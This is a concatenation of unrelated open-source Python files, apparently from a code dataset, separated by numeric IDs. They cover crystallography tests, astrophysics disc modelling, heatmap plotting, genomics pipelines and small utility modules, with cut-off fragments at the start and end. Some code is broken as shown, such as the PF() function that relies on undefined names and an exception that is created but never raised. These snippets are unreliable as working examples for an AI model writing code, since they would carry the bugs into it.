self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name, var_speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name)
|
11547870
|
from ..registry_tools import iso_register
from .core import UnitedStates
@iso_register('US-OR')
class Oregon(UnitedStates):
"""Oregon"""
include_columbus_day = False
|
11547887
|
from typing import Any, Callable, Tuple, Union
Pattern = Union[Callable, Tuple[Callable, Callable], Tuple[Callable, Callable, Callable]]
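# Illustrative examples (not from the original file): FX quantization matches
# patterns back-to-front, so a fused "conv -> relu" can be written roughly as
# (torch.nn.ReLU, torch.nn.Conv2d), while a lone callable such as
# torch.nn.Linear is also a valid Pattern.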
# This is the Quantizer class instance from torch/quantization/fx/quantize.py.
# Define separately to prevent circular imports.
# TODO(future PR): improve this.
QuantizerCls = Any
|
11547890
|
from __future__ import absolute_import, division, print_function
from cctbx.array_family import flex
import sys
from cctbx import xray
from cctbx import crystal
from mmtbx.max_lik import max_like_non_uniform
from cctbx.development import random_structure
from cctbx.development import debug_utils
#------------------------------------------------------------------------TEST-0
def test_less_one(space_group_info,
volume_per_atom = 100,
d_min = 1.8):
#symmetry = crystal.symmetry(space_group_symbol="p212121")
#space_group_info = symmetry.space_group_info()
#n_sym = space_group_info.type().group().n_smx()
for n_atoms in (1,10):
if(n_atoms == 1):
denom = 16.0
else:
denom = 4.0
for element in ("C","O","N"):
structure = random_structure.xray_structure(
space_group_info=space_group_info,
elements=[element]*n_atoms,
volume_per_atom=volume_per_atom,
random_u_iso=False)
fc = structure.structure_factors(d_min = d_min,
anomalous_flag = False,
algorithm = "fft").f_calc()
manager = max_like_non_uniform.ordered_solvent_distribution(
structure = structure,
fo = fc,
grid_step = fc.d_min()/denom)
f_water_dist = manager.fcalc_from_distribution()
### check phase compatibility with the symmetry:
centrics = f_water_dist.select_centric()
if(centrics.indices().size() > 0):
ideal = centrics.phase_transfer(centrics)
assert flex.max(flex.abs(ideal.data() - centrics.data())) < 1.e-6
###
#print "max = ", flex.max( flex.abs( f_water_dist.data() ) )
#print "min = ", flex.min( flex.abs( f_water_dist.data() ) )
#print "ave = ", flex.mean( flex.abs( f_water_dist.data() ) )
assert flex.max( flex.abs( f_water_dist.data() ) ) < 1.0
#------------------------------------------------------------------------TEST-1
def test_grid_step(n_sites = 50,
volume_per_atom = 50,
d_min = 2.0):
grid_step = (0.2,0.4,0.6,0.7,0.9,1.0)
for step in grid_step:
symmetry = crystal.symmetry(space_group_symbol="P1")
structure = random_structure.xray_structure(space_group_info = symmetry.space_group_info(),
elements=["C"]*n_sites,
volume_per_atom=volume_per_atom,
random_u_iso=False)
fc = structure.structure_factors(d_min = d_min,
anomalous_flag=False,
algorithm="fft").f_calc()
manager = max_like_non_uniform.ordered_solvent_distribution(
structure = structure,
fo = fc,
grid_step = step)
f_water_dist = manager.fcalc_from_distribution()
### check phase compatibility with the symmetry:
centrics = f_water_dist.select_centric()
if(centrics.indices().size() > 0):
ideal = centrics.phase_transfer(centrics)
assert flex.max(flex.abs(ideal.data() - centrics.data())) < 1.e-6
###
#print "max = ", flex.max( flex.abs( f_water_dist.data() ) )
#print "min = ", flex.min( flex.abs( f_water_dist.data() ) )
#print "ave = ", flex.mean( flex.abs( f_water_dist.data() ) )
assert flex.max( flex.abs( f_water_dist.data() ) ) < 1.0
#------------------------------------------------------------------------TEST-2
def test_r(space_group_info,
step = 0.6,
d_min = 4.0):
r = (-1.05,-0.1,0.0,1.05,0.1)
n_sym = space_group_info.type().group().n_smx()
if(n_sym != 8):
for x in r:
for y in r:
for z in r:
symmetry = crystal.symmetry(unit_cell = space_group_info.any_compatible_unit_cell(volume= 2000),
space_group_info = space_group_info)
#symmetry = crystal.symmetry(unit_cell=(11., 12., 13., 75., 85., 95.),
# space_group_symbol="P1")
#symmetry = crystal.symmetry(unit_cell=(11., 12., 13., 90., 90., 90.),
# space_group_symbol="p212121")
structure = xray.structure(crystal_symmetry=symmetry)
scatterer = xray.scatterer(
site = (x,y,z),
u = 0.1,
occupancy = 1.0,
scattering_type = "O")
structure.add_scatterer(scatterer)
fc = structure.structure_factors(d_min = d_min,
anomalous_flag=False,
algorithm="fft").f_calc()
manager = max_like_non_uniform.ordered_solvent_distribution(
structure = structure,
fo = fc,
grid_step = step)
f_water_dist = manager.fcalc_from_distribution()
### check phase compatibility with the symmetry:
centrics = f_water_dist.select_centric()
if(centrics.indices().size() > 0):
ideal = centrics.phase_transfer(centrics)
assert flex.max(flex.abs(ideal.data() - centrics.data())) < 1.e-6
###
#print "max = ", flex.max( flex.abs( f_water_dist.data() ) )
#print "min = ", flex.min( flex.abs( f_water_dist.data() ) )
#print "ave = ", flex.mean( flex.abs( f_water_dist.data() ) )
assert flex.max( flex.abs( f_water_dist.data() ) ) < 1.0
#------------------------------------------------------------------------
def run_call_back(flags, space_group_info):
test_less_one(space_group_info = space_group_info)
def run_call_back_1(flags, space_group_info):
test_r(space_group_info = space_group_info)
def run():
debug_utils.parse_options_loop_space_groups(sys.argv[1:], run_call_back_1,
symbols_to_stdout=True, symbols_to_stderr=False)
debug_utils.parse_options_loop_space_groups(sys.argv[1:], run_call_back,
symbols_to_stdout=True, symbols_to_stderr=False)
test_grid_step()
print("OK")
if (__name__ == "__main__"):
run()
|
11547902
|
import networkx as nx
from networkx.drawing import nx_pydot
from graph2world.generator import Generator
# from pycorenlp import StanfordCoreNLP
def get_dummy_graph():
"""
Generate a dummy graph for testing
Returns:
Graph: a simple test graph
"""
g = nx.DiGraph()
g.add_nodes_from(['kitchen', 'spoon', 'living room'])
g.add_edge('spoon', 'kitchen', type='in')
g.add_edge('kitchen', 'living room', type='connected')
g.add_edge('living room', 'kitchen', type='connected')
g.nodes['kitchen']['type'] = 'room'
g.nodes['living room']['type'] = 'room'
g.nodes['spoon']['type'] = 'object'
return g
def get_gml_graph(location):
"""
Load networkx graph from gml file
Parameters:
location (str): file path as string to *.gml
Returns:
Graph: loaded object in networkx format
"""
# nlp = StanfordCoreNLP('http://localhost:9000')
#
# text = "thousands of images of Napoleon all over London"
#
# output = nlp.annotate(text, properties={
# 'annotators': 'parse',
# 'outputFormat': 'json'
# })
#
# print(output['sentences'][0]['parse'])
#
# dependencies = output['sentences'][0]['basicDependencies']
# subjects = [x for x in dependencies if x['dep'] == 'nsubj']
# if len(subjects) >= 1:
# print(subjects[0]['governorGloss'])
# else:
# roots = [x for x in dependencies if x['dep'] == 'ROOT']
# if len(roots) >= 1:
# print(roots[0]['dependentGloss'])
# else:
# print('no head found!')
#
try:
# g = nx.read_gml(location).to_directed()
g = nx_pydot.read_dot(location).to_undirected()
# before returning graph, run
# some clean-up pre-processing
temp = sorted(g)
mapping = {}
for node in temp:
node_name = node
# escape commas, similar to csv
if ',' in node_name:
node_name = '"' + node_name + '"'
# remove period at end of name
if node_name[-1] == '.':
node_name = node_name[:-1]
# capitalize first letter in name
if not node_name[0].isupper():
if len(node_name) == 1:
node_name = node_name.upper()
else:
node_name = node_name[0].upper() + node_name[1:]
mapping[node] = node_name
g = nx.relabel_nodes(g, mapping)
# # remove double quotes if exist from flavor text
# for u, v, data in g.edges(data=True):
# for i in g[u][v]:
# if 'flavortext' in g[u][v][i]:
# if g[u][v][i]['flavortext'][0] == '"':
# g[u][v][i]['flavortext'] = g[u][v][i]['flavortext'][1:]
# # if g[u][v]['flavortext'][0] == '"':
# # print('caught')
# also need to make edges bidirectional
# new_edges = []
# for u, v, data in g.edges(data=True):
# # if data['type'] == 'connected':
# # new_edges.append((v, u))
# if 'flavortext' in data:
# new_edges.append((v, u, data['type'], data['flavortext']))
# else:
# new_edges.append((v, u, data['type'], ''))
# for new_edge in new_edges:
# g.add_edge(new_edge[0], new_edge[1], type=new_edge[2], flavortext=new_edge[3])
return g
    except Exception as err:
        # re-raise with context so the original parsing error is not swallowed
        raise Exception('Could not open file!') from err
def graph_to_world(graph, zone, output_location=None):
"""
Primary function, take a networkx graph and save generated Evennia code to location
Parameters:
graph (Graph): networkx object
output_location (str): file path as string to save *.ev
"""
gen = Generator()
gen.load_graph(graph, zone)
if output_location is None:
gen.to_file()
else:
gen.to_file(output_location)
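# --- Hedged usage sketch (not part of the original module) ---
# Shows how the helpers above could be combined: build the dummy graph and feed it
# to graph_to_world. The zone name and output path below are illustrative assumptions.
def example_dummy_world(output_location='dummy_world.ev'):
    """Minimal sketch: generate Evennia code for the dummy kitchen/living-room graph."""
    g = get_dummy_graph()
    graph_to_world(g, zone='demo_zone', output_location=output_location)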
|
11547921
|
import astropy.io.fits as fits
import matplotlib.pyplot as plt
import matplotlib.tri as tri
import numpy as np
import os
from .parameters import Params, find_parameter_file
from .run import run
class Disc:
def __init__(self, dir=None, **kwargs):
# Correct path if needed
dir = os.path.normpath(os.path.expanduser(dir))
if dir[-9:] != "data_disk":
dir = os.path.join(dir, "data_disk")
self.dir = dir
# Search for parameter file
para_file = find_parameter_file(dir)
# Read parameter file
self.P = Params(para_file)
# Read model results
self._read(**kwargs)
def _read(self):
# Read grid file
try:
hdu = fits.open(self.dir + "/grid.fits.gz")
self.grid = hdu[0].data
hdu.close()
except OSError:
print('cannot open grid.fits.gz')
# Read gas density file
try:
hdu = fits.open(self.dir + "/gas_density.fits.gz")
self.gas_density = hdu[0].data
hdu.close()
except OSError:
print('cannot open gas_density.fits.gz')
# Read volume file
try:
hdu = fits.open(self.dir + "/volume.fits.gz")
self.volume = hdu[0].data
hdu.close()
except OSError:
print('cannot open volume.fits.gz')
def r(self):
if self.grid.ndim > 2:
return self.grid[0, :, :, :]
else:
return np.sqrt(self.grid[0, :] ** 2 + self.grid[1, :] ** 2)
def z(self):
if self.grid.ndim > 2:
return self.grid[1, :, :, :]
else:
return self.grid[2, :]
def add_spiral(
self, a=30, sigma=10, f=1, theta0=0, rmin=None, rmax=None, n_az=None
):
""" Add a geometrucal spiral on a 2D (or 3D) mcfost density grid
and return a 3D array which can be directly written as a fits
file for mcfost to read
geometrical spiral r = a (theta - theta0)
surface density is mutiply by f at the crest of the spiral
the spiral has a Gaussin profil in (x,y) with sigma given in au
"""
if self.grid.ndim <= 2:
ValueError("Can only add a spiral on a cylindrical or spherical grid")
if n_az is None:
n_az = self.grid.shape[1]
phi = np.linspace(0, 2 * np.pi, n_az, endpoint=False)
r = self.grid[0, 0, 0, :]
if rmin is None:
rmin = r.min()
if rmax is None:
rmax = r.max()
x = r[np.newaxis, :] * np.cos(phi[:, np.newaxis])
y = r[np.newaxis, :] * np.sin(phi[:, np.newaxis])
# Just to test
# x = np.linspace(-100,100,500)
# x, y = np.meshgrid(x,x)
# r = np.sqrt(x**2 + y**2) # we recalcule in preparation for other types of grid
# rc=50, hc=0.15, alpha=1.5, beta=0.25
# theta_c = 0.
# theta = theta_c + np.sign(r - rc)/hc * \
# ((r/rc)**(1+beta) * (1/(1+beta) - 1/(1-alpha + beta) * (r/rc)**(-alpha)) \
# - 1/(1+beta) - 1/(1-alpha + beta))
r_spiral = np.geomspace(rmin, rmax, num=5000)
theta = r_spiral / a + theta0
x_spiral = r_spiral * np.cos(theta)
y_spiral = r_spiral * np.sin(theta)
correct = np.ones(x.shape)
# This is really badly implemented, but fast enough that we don't care
sigma2 = sigma ** 2
for i in range(x.shape[0]):
for j in range(x.shape[1]):
d2 = np.min((x_spiral - x[i, j]) ** 2 + (y_spiral - y[i, j]) ** 2)
correct[i, j] += f * np.exp(-0.5 * d2 / sigma2)
triang = tri.Triangulation(x.flatten(), y.flatten())
plt.tripcolor(triang, correct.flatten(), shading='flat')
return self.gas_density[np.newaxis, :, :] * correct[:, np.newaxis, :]
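# --- Hedged usage sketch (not part of the original module) ---
# Illustrates how add_spiral might be called; the model directory, spiral pitch `a`
# and width `sigma` below are illustrative assumptions, and the result would typically
# be written back to a density fits file for mcfost to re-read.
def example_add_spiral(model_dir="~/mcfost/model"):
    disc = Disc(model_dir)
    # density amplified by a factor (1 + f) = 3 at the spiral crest, Gaussian width 10 au
    new_density = disc.add_spiral(a=30, sigma=10, f=2)
    return new_density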
def check_grid(model):
"""
    Check if the disc structure has already been read;
    if not, try to read it from disk;
    if that also fails, try to compute it by running the model with -disk_struct.
"""
try:
grid = model.disc.grid
    except AttributeError:
try:
print("Trying to read grid structure ...")
model.disc = Disc(model.basedir)
grid = model.disc.grid
        except Exception:
print("No grid structure, trying to create it ...")
run(model.P.filename, options=model.P.options+" -disk_struct")
try:
print("Trying to read grid structure again ...")
model.disc = Disc(model.basedir)
grid = model.disc.grid
except AttributeError:
print("Cannot read grid in " + model.basedir)
return grid
def _plot_cutz(model, y, r=None, dr=None, log=None, **kwargs):
grid = check_grid(model)
if grid.ndim > 2:
r_mcfost = grid[0, 0, 0, :]
i = np.argmin(np.abs(r_mcfost - r))
print("selected_radius =", r_mcfost[i])
z_mcfost = grid[1, 0, :, i]
y = y[:,i]
if log:
plt.loglog(z_mcfost, y, **kwargs)
else:
plt.plot(z_mcfost, y, **kwargs)
else:
r_mcfost = np.sqrt(grid[0, :] ** 2 + grid[1, :] ** 2)
ou = r_mcfost > 1e-6 # Removing star
y = y[ou]
r_mcfost = r_mcfost[ou]
z_mcfost = grid[2, ou]
# Selecting data points
ou = (r_mcfost > r - dr) & (r_mcfost < r + dr)
z_mcfost = z_mcfost[ou]
y = y[ou]
#plt.plot(z_mcfost, T, "o", **kwargs)
fig = plt.gcf()
ax = fig.add_subplot(1, 1, 1, projection='scatter_density')
density = ax.scatter_density(z_mcfost,y, **kwargs)
plt.xlabel("z [au]")
|
11547978
|
import numpy as np
import pdb
import matplotlib as plt
plt.use('AGG')
import pylab as py
import matplotlib.cm
from matplotlib.cm import ScalarMappable
import skimage.io
import skimage.filters
from skimage import feature
import pickle
def normit(x):
x = (x-np.min(x))/(np.max(x)-np.min(x))
return x
def PLOT(mfi,savepath):
'''
:param mfi: feature importance map of the digit
:param savepath: path to result heatmap picture
:return: -
'''
py.imshow(np.reshape(mfi, (16, 16)))
py.savefig(savepath)
def PLOTnum(mfi, savepath, digit,prediction=1):
'''
:param mfi: feature importance map of the digit
:param savepath: path to result heatmap picture
:param digit: has to be in the final plotting shape (e.g. 16 x 16 for usps data)
:return: -
'''
py.close("all")
cmp = plt.cm.get_cmap('Greys')
cmp._init()
fig = py.imshow(normit(digit), cmap=cmp, origin='lower')#, vmin=0.4, vmax=0.7)
fig.axes.get_xaxis().set_visible(False)
fig.axes.get_yaxis().set_visible(False)
cmap_used = py.get_cmap()
cmap_used._init()
cmap_used._init()
py.imshow(np.reshape(normit(mfi), digit.shape))
alphas = np.linspace(0.2, 0.9, cmap_used.N + 3)
cmap_used._lut[40:190, 0:3] = [1, 1, 1]
#
cmap_used._lut[40:190, -1] = 0.4#alphas[30:180] #
py.tight_layout()
py.colorbar()
py.title(str(prediction))
py.savefig(savepath, bbox_inches=0, orientation='landscape', pad_inches=0.1)
def PLOTnum3(mfis, savepath, digits,prediction=None):
'''
:param mfi: feature importance map of the digit
:param savepath: path to result heatmap picture
:param digit: has to be in the final plotting shape (e.g. 16 x 16 for usps data)
:return: -
'''
py.close("all")
cmp = plt.cm.get_cmap('Greys')
cmp._init()
for i,mfi in enumerate(mfis):
py.subplot(2, len(mfis), i + 1)
fig = py.imshow(vec2im(digits[i]),cmap = cmp)
fig.axes.get_xaxis().set_visible(False)
fig.axes.get_yaxis().set_visible(False)
for i,mfi in enumerate(mfis):
rgb = hm_to_rgb(mfi, X=digits[i])
py.subplot(2, len(mfis), len(mfis) + 1 + i)
fig = py.imshow(rgb,interpolation='spline16')
fig.axes.get_xaxis().set_visible(False)
fig.axes.get_yaxis().set_visible(False)
        if prediction is not None:
py.title(str(np.round(prediction[i],2)))
py.savefig(savepath, bbox_inches=0, orientation='landscape', pad_inches=0.1)
def vec2im(V, shape = () ):
# function taken from https://github.com/sebastian-lapuschkin/lrp_toolbox/blob/master/python/render.py
'''
Transform an array V into a specified shape - or if no shape is given assume a square output format.
Parameters
----------
V : numpy.ndarray
an array either representing a matrix or vector to be reshaped into an two-dimensional image
shape : tuple or list
optional. containing the shape information for the output array if not given, the output is assumed to be square
Returns
-------
W : numpy.ndarray
with W.shape = shape or W.shape = [np.sqrt(V.size)]*2
'''
if len(shape) < 2:
        shape = [int(np.sqrt(V.size))]*2
return np.reshape(V, shape)
def enlarge_image(img, scaling = 3):
# function taken from https://github.com/sebastian-lapuschkin/lrp_toolbox/blob/master/python/render.py
'''
Enlarges a given input matrix by replicating each pixel value scaling times in horizontal and vertical direction.
Parameters
----------
img : numpy.ndarray
array of shape [H x W] OR [H x W x D]
scaling : int
positive integer value > 0
Returns
-------
out : numpy.ndarray
two-dimensional array of shape [scaling*H x scaling*W]
OR
three-dimensional array of shape [scaling*H x scaling*W x D]
depending on the dimensionality of the input
'''
if scaling < 1 or not isinstance(scaling,int):
        print('scaling factor needs to be an int >= 1')
if len(img.shape) == 2:
H,W = img.shape
out = np.zeros((scaling*H, scaling*W))
for h in range(H):
fh = scaling*h
for w in range(W):
fw = scaling*w
out[fh:fh+scaling, fw:fw+scaling] = img[h,w]
elif len(img.shape) == 3:
H,W,D = img.shape
out = np.zeros((scaling*H, scaling*W,D))
for h in range(H):
fh = scaling*h
for w in range(W):
fw = scaling*w
out[fh:fh+scaling, fw:fw+scaling,:] = img[h,w,:]
return out
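# --- Hedged illustration (not part of the original code) ---
# Tiny concrete example of enlarge_image: each pixel of a 2x2 array is replicated
# into a 2x2 block, giving a 4x4 output.
def example_enlarge_image():
    img = np.array([[1, 2], [3, 4]])
    out = enlarge_image(img, scaling=2)
    # out == [[1,1,2,2],[1,1,2,2],[3,3,4,4],[3,3,4,4]]
    return out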
def hm_to_rgb(R, X = None, scaling = 3, shape = (), sigma = 2, cmap = 'jet', normalize = True):
# function taken from https://github.com/sebastian-lapuschkin/lrp_toolbox/blob/master/python/render.py
'''
Takes as input an intensity array and produces a rgb image for the represented heatmap.
optionally draws the outline of another input on top of it.
Parameters
----------
R : numpy.ndarray
the heatmap to be visualized, shaped [M x N]
X : numpy.ndarray
optional. some input, usually the data point for which the heatmap R is for, which shall serve
as a template for a black outline to be drawn on top of the image
shaped [M x N]
scaling: int
factor, on how to enlarge the heatmap (to control resolution and as a inverse way to control outline thickness)
after reshaping it using shape.
shape: tuple or list, length = 2
optional. if not given, X is reshaped to be square.
sigma : double
optional. sigma-parameter for the canny algorithm used for edge detection. the found edges are drawn as outlines.
cmap : str
optional. color map of choice
normalize : bool
optional. whether to normalize the heatmap to [-1 1] prior to colorization or not.
Returns
-------
rgbimg : numpy.ndarray
three-dimensional array of shape [scaling*H x scaling*W x 3] , where H*W == M*N
'''
X = normit(X)# (X + 1.) / 2.
#create color map object from name string
    cmap = getattr(matplotlib.cm, cmap)  # look up the color map object by name
R = normit(R)
R = enlarge_image(vec2im(R,shape), scaling)
rgb = cmap(R.flatten())[...,0:3].reshape([R.shape[0],R.shape[1],3])
#rgb = repaint_corner_pixels(rgb, scaling) #obsolete due to directly calling the color map with [0,1]-normalized inputs
    if X is not None: #compute the outline of the input
X = enlarge_image(vec2im(X,shape), scaling)
xdims = X.shape
Rdims = R.shape
if not np.all(xdims == Rdims):
            print('transformed heatmap and data dimension mismatch. data dimensions differ?')
            print('R.shape = ', Rdims, 'X.shape = ', xdims)
            print('skipping drawing of outline\n')
else:
edges = feature.canny(X, sigma=2.)
edges = np.invert(np.dstack([edges]*3))*1.0
rgb *= edges # set outline pixels to black color
return rgb
def PFplot(values,names):
py.cla()
fs = 34
py.close("all")
val_means = []
val_std = []
for r in range(len(names)):
val_means.append(np.mean(values[r:len(names):len(values)],0))
val_std.append(np.std(values[r:len(names):len(values)],0))
for i,val in enumerate(val_means):
py.plot(val_means[i], linewidth=5.0, alpha=0.6, label=names[i])
py.xlabel("Flipping pixels", fontsize=fs)
py.ylabel("Score", fontsize=fs)
py.xticks(range(50, len(val_means[0]), 100), fontsize=fs)
py.yticks(fontsize=fs)
py.legend(loc='best',fontsize=20, fancybox=True, framealpha=0.7)
py.tight_layout()
py.savefig("results/pf.pdf")
def PF():
values=[]
for r in range(200):
for s, samples in enumerate(Samplesets):
for i in range(len(metric)):
fobj = open("results/mfi_sample_" + str(s) + ".pkl", 'rb')
mfi = pickle.load(fobj)
fobj.close()
values.append(tools.pixel_flipping(clf,np.mean(x,axis=0),mfi,100))
values.append(tools.pixel_flipping(clf, np.mean(x, axis=0), np.random.uniform(0, 1, len(mfi)), 100))
names = ["random samples","training samples","random mfi"]
fobj = open("results/pf.pkl","wb")
pickle.dump([values,names],fobj)
fobj.close()
|
11547994
|
import os
import yaml
def catlas_build(conf_file):
"Produce the list of files output by 'spacegraphcats <config> build"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
catlas_base = jj["catlas_base"]
ksize = jj["ksize"]
radius = jj["radius"]
cdbg_dir = f"{catlas_base}_k{ksize}"
catlas_dir = f"{catlas_base}_k{ksize}_r{radius}"
z = []
z.append(os.path.join(cdbg_dir, "bcalm.unitigs.db")),
z.append(os.path.join(cdbg_dir, "cdbg.gxt"))
z.append(os.path.join(cdbg_dir, "contigs.indices"))
z.append(os.path.join(cdbg_dir, "contigs.sizes"))
z.append(os.path.join(cdbg_dir, "contigs.info.csv"))
z.append(os.path.join(cdbg_dir, "contigs.mphf"))
z.append(os.path.join(catlas_dir, "catlas.csv"))
z.append(os.path.join(catlas_dir, "first_doms.txt"))
return z
def catlas_search(conf_file, cdbg_only=False, suffix=""):
"Produce the list of files output by 'spacegraphcats <config> search"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
catlas_base = jj["catlas_base"]
ksize = jj["ksize"]
radius = jj["radius"]
cdbg_str = ""
if cdbg_only:
cdbg_str = "_cdbg"
dirname = "{}_k{}_r{}{}_search_oh0{}".format(
catlas_base, ksize, radius, cdbg_str, suffix
)
filenames = jj["search"]
z = []
for x in filenames:
x = os.path.basename(x)
z.append(os.path.join(dirname, "{}.cdbg_ids.txt.gz".format(x)))
z.append(os.path.join(dirname, "{}.contigs.sig".format(x)))
z.append(os.path.join(dirname, "{}.frontier.txt.gz".format(x)))
z.append(os.path.join(dirname, "{}.response.txt".format(x)))
z.append(os.path.join(dirname, "results.csv"))
return z
def catlas_extract_contigs(conf_file, cdbg_only=False, suffix=""):
"Produce the list of files output by 'spacegraphcats <config> extract_contigs"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
catlas_base = jj["catlas_base"]
ksize = jj["ksize"]
radius = jj["radius"]
cdbg_str = ""
if cdbg_only:
cdbg_str = "_cdbg"
dirname = "{}_k{}_r{}{}_search_oh0{}".format(
catlas_base, ksize, radius, cdbg_str, suffix
)
filenames = jj["search"]
z = []
for x in filenames:
x = os.path.basename(x)
z.append(os.path.join(dirname, "{}.cdbg_ids.contigs.fa.gz".format(x)))
return z
def catlas_extract_reads(conf_file, cdbg_only=False, suffix=""):
"Produce the list of files output by 'spacegraphcats <config> extract_reads"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
catlas_base = jj["catlas_base"]
ksize = jj["ksize"]
radius = jj["radius"]
cdbg_str = ""
if cdbg_only:
cdbg_str = "_cdbg"
dirname = "{}_k{}_r{}{}_search_oh0{}".format(
catlas_base, ksize, radius, cdbg_str, suffix
)
filenames = jj["search"]
z = []
for x in filenames:
x = os.path.basename(x)
z.append(os.path.join(dirname, "{}.cdbg_ids.reads.gz".format(x)))
return z
def catlas_search_input(conf_file):
"Produce the list of files required by 'spacegraphcats <config> search"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
filenames = jj["search"]
return filenames
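# --- Hedged usage sketch (not part of the original module) ---
# Shows the kind of file list catlas_build produces for a minimal config; the
# config values and temporary file name below are illustrative assumptions.
def example_catlas_build(tmp_conf="example-conf.yaml"):
    conf = {"catlas_base": "twofoo", "ksize": 31, "radius": 1, "search": []}
    with open(tmp_conf, "wt") as fp:
        yaml.safe_dump(conf, fp)
    # e.g. returns paths under twofoo_k31/ and twofoo_k31_r1/
    return catlas_build(tmp_conf)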
|
11548007
|
from __future__ import print_function
import os
import sys
import os.path as op
from collections import Counter, namedtuple
import pickle
import json
import numpy as np
import pandas as pd
import pybedtools
from seqcluster.libs.utils import file_exists
import seqcluster.libs.logger as mylog
from seqcluster.libs import do
from seqcluster.libs.read import load_data
from seqcluster.libs.mystats import up_threshold
from seqcluster.detect.cluster import detect_clusters, clean_bam_file, peak_calling, detect_complexity
from seqcluster.detect.description import best_precursor
from seqcluster.libs.annotation import anncluster
from seqcluster.libs.inputs import parse_ma_file
from seqcluster.detect.metacluster import reduceloci, _get_seqs
from seqcluster.libs.tool import generate_position_bed
from seqcluster.libs.classes import *
import seqcluster.libs.parameters as param
from seqcluster.db import make_database
logger = mylog.getLogger(__name__)
def cluster(args):
"""
Creating clusters
"""
args = _check_args(args)
read_stats_file = op.join(args.dir_out, "read_stats.tsv")
if file_exists(read_stats_file):
os.remove(read_stats_file)
bam_file, seq_obj = _clean_alignment(args)
logger.info("Parsing matrix file")
seqL, y, l = parse_ma_file(seq_obj, args.ffile)
# y, l = _total_counts(seqL.keys(), seqL)
logger.info("counts after: %s" % sum(y.values()))
logger.info("# sequences after: %s" % l)
    dt = pd.DataFrame({'sample': list(y.keys()), 'counts': list(y.values())})
dt['step'] = 'aligned'
dt.to_csv(read_stats_file, sep="\t", index=False, header=False, mode='a')
    if len(seqL) < 10:
        logger.error("It seems you have low coverage. Please check that your fastq files have enough sequences.")
        raise ValueError("Too few sequences.")
logger.info("Cleaning bam file")
y, l = _total_counts(list(seqL.keys()), seqL)
logger.info("counts after: %s" % sum(y.values()))
logger.info("# sequences after: %s" % l)
    dt = pd.DataFrame({'sample': list(y.keys()), 'counts': list(y.values())})
dt['step'] = 'cleaned'
dt.to_csv(read_stats_file, sep="\t", index=False, header=False, mode='a')
clusL = _create_clusters(seqL, bam_file, args)
y, l = _total_counts(list(clusL.seq.keys()), clusL.seq, aligned=True)
logger.info("counts after: %s" % sum(y.values()))
logger.info("# sequences after: %s" % l)
    dt = pd.DataFrame({'sample': list(y.keys()), 'counts': list(y.values())})
dt['step'] = 'clusters'
dt.to_csv(read_stats_file, sep="\t", index=False, header=False, mode='a')
logger.info("Solving multi-mapping events in the network of clusters")
clusLred = _cleaning(clusL, args.dir_out)
y, l = _total_counts(clusLred.clus, seqL)
logger.info("counts after: %s" % sum(y.values()))
logger.info("# sequences after: %s" % l)
    dt = pd.DataFrame({'sample': list(y.keys()), 'counts': list(y.values())})
dt['step'] = 'meta-cluster'
dt.to_csv(read_stats_file, sep="\t", index=False, header=False, mode='a')
logger.info("Clusters up to %s" % (len(clusLred.clus.keys())))
if args.show:
logger.info("Creating sequences alignment to precursor")
clusLred = show_seq(clusLred, args.index)
clusLred = peak_calling(clusLred)
clusLred = _annotate(args, clusLred)
logger.info("Creating json and count matrix")
json_file = _create_json(clusLred, args)
logger.info("Output file in: %s" % args.dir_out)
if args.db:
name = args.db + ".db"
logger.info("Create database: database/" + name)
data = load_data(json_file)
out_dir = op.join(args.dir_out, "database")
make_database(data, name, out_dir)
logger.info("Finished")
def _check_args(args):
"""
check arguments before starting analysis.
"""
logger.info("Checking parameters and files")
args.dir_out = args.out
args.samplename = "pro"
global decision_cluster
global similar
if not os.path.isdir(args.out):
logger.warning("the output folder doens't exists")
os.mkdir(args.out)
if args.bed and args.gtf:
logger.error("cannot provide -b and -g at the same time")
raise SyntaxError
if args.debug:
logger.info("DEBUG messages will be showed in file.")
if args.bed:
args.list_files = args.bed
args.type_ann = "bed"
if args.gtf:
args.list_files = args.gtf
args.type_ann = "gtf"
logger.info("Output dir will be: %s" % args.dir_out)
if not all([file_exists(args.ffile), file_exists(args.afile)]):
logger.error("I/O error: Seqs.ma or Seqs.bam. ")
raise IOError("Seqs.ma or/and Seqs.bam doesn't exists.")
if hasattr(args, 'list_files'):
beds = args.list_files.split(",")
for filebed in beds:
if not file_exists(filebed):
logger.error("I/O error: {0}".format(filebed))
raise IOError("%s annotation files doesn't exist" % filebed)
param.decision_cluster = args.method
if args.similar:
param.similar = float(args.similar)
if args.min_seqs:
param.min_seqs = int(args.min_seqs)
return args
def _total_counts(seqs, seqL, aligned=False):
"""
Counts total seqs after each step
"""
total = Counter()
nseqs = 0
if isinstance(seqs, list):
if not aligned:
nseqs = len([total.update(seqL[s].freq) for s in seqs])
else:
nseqs = len([total.update(seqL[s].freq) for s in seqs if seqL[s].align > 0])
elif isinstance(seqs, dict):
[total.update(seqs[s].get_freq(seqL)) for s in seqs]
nseqs = sum(len(seqs[s].idmembers) for s in seqs)
return total, nseqs
def _write_size_table(data_freq, data_len, ann_valid, cluster_id):
dd = Counter()
for f, l in zip(data_freq, data_len):
dd[l] += np.mean(list(f.values()))
table = ""
for l in sorted(dd):
table += "%s\t%s\t%s\t%s\n" % (l, dd[l], ann_valid, cluster_id)
return table
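# --- Hedged illustration (not part of the original code) ---
# _write_size_table with two toy sequences of length 21 and 22: the mean of the
# per-sample counts is accumulated per read length, giving one tab-separated row
# per length ("21  3.0  miRNA  7" and "22  2.0  miRNA  7").
def _example_write_size_table():
    data_freq = [{'s1': 2, 's2': 4}, {'s1': 1, 's2': 3}]
    data_len = [21, 22]
    return _write_size_table(data_freq, data_len, "miRNA", 7)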
def _get_annotation(c, loci):
"""get annotation of transcriptional units"""
data_ann_temp = {}
data_ann = []
counts = Counter()
for lid in c.loci2seq:
# original Py 2.7 code
#for dbi in loci[lid].db_ann.keys():
# data_ann_temp[dbi] = {dbi: map(lambda (x): loci[lid].db_ann[dbi].ann[x].name, loci[lid].db_ann[dbi].ann.keys())}
# suggestion by 2to3
for dbi in list(loci[lid].db_ann.keys()):
